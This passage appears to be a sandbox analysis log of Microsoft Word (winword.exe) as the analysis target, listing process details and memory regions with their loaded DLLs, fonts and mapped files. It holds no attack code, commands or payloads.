# Flog Txt Version 1 # Analyzer Version: 2.2.0 # Analyzer Build Date: Sep 28 2017 17:24:42 # Log Creation Date: 12.10.2017 10:38:02.453 Process: id = "1" image_name = "winword.exe" filename = "c:\\program files\\microsoft office\\office15\\winword.exe" page_root = "0x7eef7760" os_pid = "0x9c4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE\"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 136 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 137 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 138 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 139 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 140 start_va = 0x140000 end_va = 0x143fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 141 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 142 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 143 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 144 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 145 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 146 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 147 start_va = 0x210000 end_va = 0x21ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 148 start_va = 0x220000 end_va = 0x221fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 149 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 150 start_va = 0x330000 end_va = 0x360fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 151 start_va = 0x370000 end_va = 0x379fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 152 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 153 start_va = 0x390000 end_va = 0x396fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 154 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 155 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 156 start_va = 0x3c0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 157 start_va = 0x3d0000 end_va = 0x3d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 158 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 159 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 160 start_va = 0x400000 end_va = 0x4c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 161 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 162 start_va = 0x5e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 163 start_va = 0x5f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 164 start_va = 0x600000 end_va = 0x600fff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 165 start_va = 0x610000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 166 start_va = 0x630000 end_va = 0x63ffff entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 167 start_va = 0x640000 end_va = 0x71efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 168 start_va = 0x720000 end_va = 0x720fff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 169 start_va = 0x730000 end_va = 0x730fff entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 170 start_va = 0x740000 end_va = 0x740fff entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 171 start_va = 0x750000 end_va = 0x750fff entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 172 start_va = 0x760000 end_va = 0x760fff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 173 start_va = 0x770000 end_va = 0x770fff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 174 start_va = 0x780000 end_va = 0x780fff entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 175 start_va = 0x790000 end_va = 0x790fff entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 176 start_va = 0x7a0000 end_va = 0x7a0fff entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 177 start_va = 0x7b0000 end_va = 0x7b0fff entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 178 start_va = 0x7c0000 end_va = 0x7c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 179 start_va = 0x7d0000 end_va = 0x7d0fff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 180 start_va = 0x7e0000 end_va = 0x81ffff entry_point = 0x0 region_type = private name = "private_0x00000000007e0000" filename = "" Region: id = 181 start_va = 0x820000 end_va = 0x820fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 182 start_va = 0x830000 end_va = 0x833fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 183 start_va = 0x840000 end_va = 0x840fff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 184 start_va = 0x850000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 185 start_va = 0x860000 end_va = 0x95ffff entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 186 start_va = 0x960000 end_va = 0xa5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000960000" filename = "" Region: id = 187 start_va = 0xa60000 end_va = 0xa60fff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 188 start_va = 0xa70000 end_va = 0xa71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a70000" filename = "" Region: id = 189 start_va = 0xa80000 end_va = 0xa80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 190 start_va = 0xa90000 end_va = 0xa90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 191 start_va = 0xaa0000 end_va = 0xaa0fff entry_point = 0xaa0000 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 192 start_va = 0xab0000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 193 start_va = 0xac0000 end_va = 0xbbffff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 194 start_va = 0xbc0000 end_va = 0xbe5fff entry_point = 0xbc0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db") Region: id = 195 start_va = 0xbf0000 end_va = 0xbf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bf0000" filename = "" Region: id = 196 start_va = 0xc00000 end_va = 0xc00fff entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 197 start_va = 0xc10000 end_va = 0xde6fff entry_point = 0xc10000 region_type = mapped_file name = "winword.exe" filename = "\\Program Files\\Microsoft Office\\Office15\\WINWORD.EXE" (normalized: "c:\\program files\\microsoft office\\office15\\winword.exe") Region: id = 198 start_va = 0xdf0000 end_va = 0x19effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000df0000" filename = "" Region: id = 199 start_va = 0x19f0000 end_va = 0x1de2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019f0000" filename = "" Region: id = 200 start_va = 0x1df0000 end_va = 0x20befff entry_point = 0x1df0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 201 start_va = 0x20c0000 end_va = 0x213ffff entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 202 start_va = 0x2140000 end_va = 0x2150fff entry_point = 0x2140000 region_type = mapped_file name = "c_1255.nls" filename = "\\Windows\\System32\\C_1255.NLS" (normalized: "c:\\windows\\system32\\c_1255.nls") Region: id = 203 start_va = 0x2160000 end_va = 0x2160fff entry_point = 0x0 region_type = private name = "private_0x0000000002160000" filename = "" Region: id = 204 start_va = 0x2170000 end_va = 0x2170fff entry_point = 0x0 region_type = private name = "private_0x0000000002170000" filename = "" Region: id = 205 start_va = 0x2180000 end_va = 0x227ffff entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 206 start_va = 0x2280000 end_va = 0x2280fff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 207 start_va = 0x2290000 end_va = 0x2290fff entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 208 start_va = 0x22a0000 end_va = 0x22a0fff entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 209 start_va = 0x22b0000 end_va = 0x22b0fff entry_point = 0x0 region_type = private name = "private_0x00000000022b0000" filename = "" Region: id = 210 start_va = 0x22c0000 end_va = 0x22c0fff entry_point = 0x0 region_type = private name = "private_0x00000000022c0000" filename = "" Region: id = 211 start_va = 0x22d0000 end_va = 0x22d0fff entry_point = 0x0 region_type = private name = "private_0x00000000022d0000" filename = "" Region: id = 212 start_va = 0x22e0000 end_va = 0x22e0fff entry_point = 0x0 region_type = private name = "private_0x00000000022e0000" filename = "" Region: id = 213 start_va = 0x22f0000 end_va = 0x22f0fff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 214 start_va = 0x2300000 end_va = 0x2300fff entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 215 start_va = 0x2310000 end_va = 0x2310fff entry_point = 0x0 region_type = private name = "private_0x0000000002310000" filename = "" Region: id = 216 start_va = 0x2320000 end_va = 0x2320fff entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 217 start_va = 0x2330000 end_va = 0x2330fff entry_point = 0x0 region_type = private name = "private_0x0000000002330000" filename = "" Region: id = 218 start_va = 0x2340000 end_va = 0x2340fff entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 219 start_va = 0x2350000 end_va = 0x2350fff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 220 start_va = 0x2360000 end_va = 0x2360fff entry_point = 0x0 region_type = private name = "private_0x0000000002360000" filename = "" Region: id = 221 start_va = 0x2370000 end_va = 0x2370fff entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 222 start_va = 0x2380000 end_va = 0x239efff entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 223 start_va = 0x23a0000 end_va = 0x249ffff entry_point = 0x0 region_type = private name = "private_0x00000000023a0000" filename = "" Region: id = 224 start_va = 0x24a0000 end_va = 0x259ffff entry_point = 0x0 region_type = private name = "private_0x00000000024a0000" filename = "" Region: id = 225 start_va = 0x25a0000 end_va = 0x25a0fff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 226 start_va = 0x25b0000 end_va = 0x25b0fff entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 227 start_va = 0x25c0000 end_va = 0x25c0fff entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 228 start_va = 0x25d0000 end_va = 0x25d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 229 start_va = 0x26e0000 end_va = 0x275efff entry_point = 0x26e0000 region_type = mapped_file name = "segoeui.ttf" filename = "\\Windows\\Fonts\\segoeui.ttf" (normalized: "c:\\windows\\fonts\\segoeui.ttf") Region: id = 230 start_va = 0x2770000 end_va = 0x27affff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 231 start_va = 0x27b0000 end_va = 0x28affff entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 232 start_va = 0x28e0000 end_va = 0x28effff entry_point = 0x0 region_type = private name = "private_0x00000000028e0000" filename = "" Region: id = 233 start_va = 0x2900000 end_va = 0x29fffff entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 234 start_va = 0x2a00000 end_va = 0x2dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a00000" filename = "" Region: id = 235 start_va = 0x2e00000 end_va = 0x372ffff entry_point = 0x2e00000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 236 start_va = 0x3760000 end_va = 0x385ffff entry_point = 0x0 region_type = private name = "private_0x0000000003760000" filename = "" Region: id = 237 start_va = 0x3860000 end_va = 0x389ffff entry_point = 0x0 region_type = private name = "private_0x0000000003860000" filename = "" Region: id = 238 start_va = 0x38a0000 end_va = 0x399ffff entry_point = 0x0 region_type = private name = "private_0x00000000038a0000" filename = "" Region: id = 239 start_va = 0x39a0000 end_va = 0x3a03fff entry_point = 0x39a0000 region_type = mapped_file name = "seguisb.ttf" filename = "\\Windows\\Fonts\\seguisb.ttf" (normalized: "c:\\windows\\fonts\\seguisb.ttf") Region: id = 240 start_va = 0x3a10000 end_va = 0x3a4ffff entry_point = 0x0 region_type = private name = "private_0x0000000003a10000" filename = "" Region: id = 241 start_va = 0x3ad0000 end_va = 0x3b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000003ad0000" filename = "" Region: id = 242 start_va = 0x3b70000 end_va = 0x3baffff entry_point = 0x0 region_type = private name = "private_0x0000000003b70000" filename = "" Region: id = 243 start_va = 0x3bd0000 end_va = 0x3bdffff entry_point = 0x0 region_type = private name = "private_0x0000000003bd0000" filename = "" Region: id = 244 start_va = 0x3be0000 end_va = 0x43dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003be0000" filename = "" Region: id = 245 start_va = 0x4410000 end_va = 0x450ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 246 start_va = 0x4560000 end_va = 0x465ffff entry_point = 0x0 region_type = private name = "private_0x0000000004560000" filename = "" Region: id = 247 start_va = 0x4700000 end_va = 0x473ffff entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 248 start_va = 0x47b0000 end_va = 0x48affff entry_point = 0x0 region_type = private name = "private_0x00000000047b0000" filename = "" Region: id = 249 start_va = 0x48b0000 end_va = 0x4caffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048b0000" filename = "" Region: id = 250 start_va = 0x4cb0000 end_va = 0x4d6ffff entry_point = 0x4cb0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 251 start_va = 0x4d70000 end_va = 0x516ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d70000" filename = "" Region: id = 252 start_va = 0x5170000 end_va = 0x536ffff entry_point = 0x0 region_type = private name = "private_0x0000000005170000" filename = "" Region: id = 253 start_va = 0x5420000 end_va = 0x581ffff entry_point = 0x0 region_type = private name = "private_0x0000000005420000" filename = "" Region: id = 254 start_va = 0x5820000 end_va = 0x601ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005820000" filename = "" Region: id = 255 start_va = 0x6020000 end_va = 0x6420fff entry_point = 0x0 region_type = private name = "private_0x0000000006020000" filename = "" Region: id = 256 start_va = 0x6430000 end_va = 0x6830fff entry_point = 0x0 region_type = private name = "private_0x0000000006430000" filename = "" Region: id = 257 start_va = 0x6840000 end_va = 0x6c40fff entry_point = 0x0 region_type = private name = "private_0x0000000006840000" filename = "" Region: id = 258 start_va = 0x6c50000 end_va = 0x6e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000006c50000" filename = "" Region: id = 259 start_va = 0x6e50000 end_va = 0x730ffff entry_point = 0x0 region_type = private name = "private_0x0000000006e50000" filename = "" Region: id = 260 start_va = 0x7310000 end_va = 0x770ffff entry_point = 0x0 region_type = private name = "private_0x0000000007310000" filename = "" Region: id = 261 start_va = 0x7710000 end_va = 0x7f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000007710000" filename = "" Region: id = 262 start_va = 0x36890000 end_va = 0x3689ffff entry_point = 0x0 region_type = private name = "private_0x0000000036890000" filename = "" Region: id = 263 start_va = 0x63b00000 end_va = 0x63b2cfff entry_point = 0x63b00000 region_type = mapped_file name = "osppc.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 264 start_va = 0x63b30000 end_va = 0x63cbdfff entry_point = 0x63b30000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\RICHED20.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\riched20.dll") Region: id = 265 start_va = 0x63cc0000 end_va = 0x63d74fff entry_point = 0x63cc0000 region_type = mapped_file name = "adal.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\ADAL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\adal.dll") Region: id = 266 start_va = 0x63d80000 end_va = 0x63df9fff entry_point = 0x63d80000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 267 start_va = 0x63ed0000 end_va = 0x63fd9fff entry_point = 0x63ed0000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 268 start_va = 0x63fe0000 end_va = 0x6410bfff entry_point = 0x63fe0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 269 start_va = 0x64110000 end_va = 0x68dfafff entry_point = 0x64110000 region_type = mapped_file name = "msores.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSORES.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\msores.dll") Region: id = 270 start_va = 0x68e00000 end_va = 0x6a6e3fff entry_point = 0x68e00000 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\mso.dll") Region: id = 271 start_va = 0x6a6f0000 end_va = 0x6bbabfff entry_point = 0x6a6f0000 region_type = mapped_file name = "wwlib.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\WWLIB.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\wwlib.dll") Region: id = 272 start_va = 0x6bbc0000 end_va = 0x6bc09fff entry_point = 0x6bbc0000 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\System32\\mscoree.dll" (normalized: "c:\\windows\\system32\\mscoree.dll") Region: id = 273 start_va = 0x6bc10000 end_va = 0x6bc92fff entry_point = 0x6bc10000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 274 start_va = 0x6bca0000 end_va = 0x6bdb5fff entry_point = 0x6bca0000 region_type = mapped_file name = "msptls.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\msptls.dll") Region: id = 275 start_va = 0x6bdc0000 end_va = 0x6c130fff entry_point = 0x6bdc0000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\1033\\msointl.dll") Region: id = 276 start_va = 0x6c140000 end_va = 0x6c1fffff entry_point = 0x6c140000 region_type = mapped_file name = "wwintl.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\1033\\WWINTL.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\1033\\wwintl.dll") Region: id = 277 start_va = 0x6c200000 end_va = 0x6c2b9fff entry_point = 0x6c200000 region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll") Region: id = 278 start_va = 0x6c2c0000 end_va = 0x6d067fff entry_point = 0x6c2c0000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\OART.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\oart.dll") Region: id = 279 start_va = 0x6ed70000 end_va = 0x6ed84fff entry_point = 0x6ed70000 region_type = mapped_file name = "msohev.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\MSOHEV.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\msohev.dll") Region: id = 280 start_va = 0x6f5b0000 end_va = 0x6f600fff entry_point = 0x6f5b0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 281 start_va = 0x6fa80000 end_va = 0x6fbd7fff entry_point = 0x6fa80000 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 282 start_va = 0x70ac0000 end_va = 0x70fbffff entry_point = 0x70ac0000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE15\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\common files\\microsoft shared\\office15\\cultures\\office.odf") Region: id = 283 start_va = 0x70fc0000 end_va = 0x711fffff entry_point = 0x70fc0000 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 284 start_va = 0x71230000 end_va = 0x71298fff entry_point = 0x71230000 region_type = mapped_file name = "msvcp100.dll" filename = "\\Windows\\System32\\msvcp100.dll" (normalized: "c:\\windows\\system32\\msvcp100.dll") Region: id = 285 start_va = 0x712a0000 end_va = 0x7135efff entry_point = 0x712a0000 region_type = mapped_file name = "msvcr100.dll" filename = "\\Windows\\System32\\msvcr100.dll" (normalized: "c:\\windows\\system32\\msvcr100.dll") Region: id = 286 start_va = 0x716f0000 end_va = 0x71772fff entry_point = 0x716f0000 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll") Region: id = 287 start_va = 0x71780000 end_va = 0x717b9fff entry_point = 0x71780000 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll") Region: id = 288 start_va = 0x717c0000 end_va = 0x717ebfff entry_point = 0x717c0000 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll") Region: id = 289 start_va = 0x719c0000 end_va = 0x71a0efff entry_point = 0x719c0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 290 start_va = 0x71a10000 end_va = 0x71a67fff entry_point = 0x71a10000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 291 start_va = 0x71fc0000 end_va = 0x71fc4fff entry_point = 0x71fc0000 region_type = mapped_file name = "msimg32.dll" filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll") Region: id = 292 start_va = 0x735e0000 end_va = 0x736dafff entry_point = 0x735e0000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 293 start_va = 0x736e0000 end_va = 0x736f2fff entry_point = 0x736e0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 294 start_va = 0x73840000 end_va = 0x739cffff entry_point = 0x73840000 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 295 start_va = 0x739d0000 end_va = 0x73a0ffff entry_point = 0x739d0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 296 start_va = 0x74180000 end_va = 0x7418cfff entry_point = 0x74180000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 297 start_va = 0x742b0000 end_va = 0x7444dfff entry_point = 0x742b0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 298 start_va = 0x74600000 end_va = 0x746f4fff entry_point = 0x74600000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 299 start_va = 0x74800000 end_va = 0x74820fff entry_point = 0x74800000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 300 start_va = 0x74940000 end_va = 0x74948fff entry_point = 0x74940000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 301 start_va = 0x74c20000 end_va = 0x74c5afff entry_point = 0x74c20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 302 start_va = 0x74e70000 end_va = 0x74e85fff entry_point = 0x74e70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: 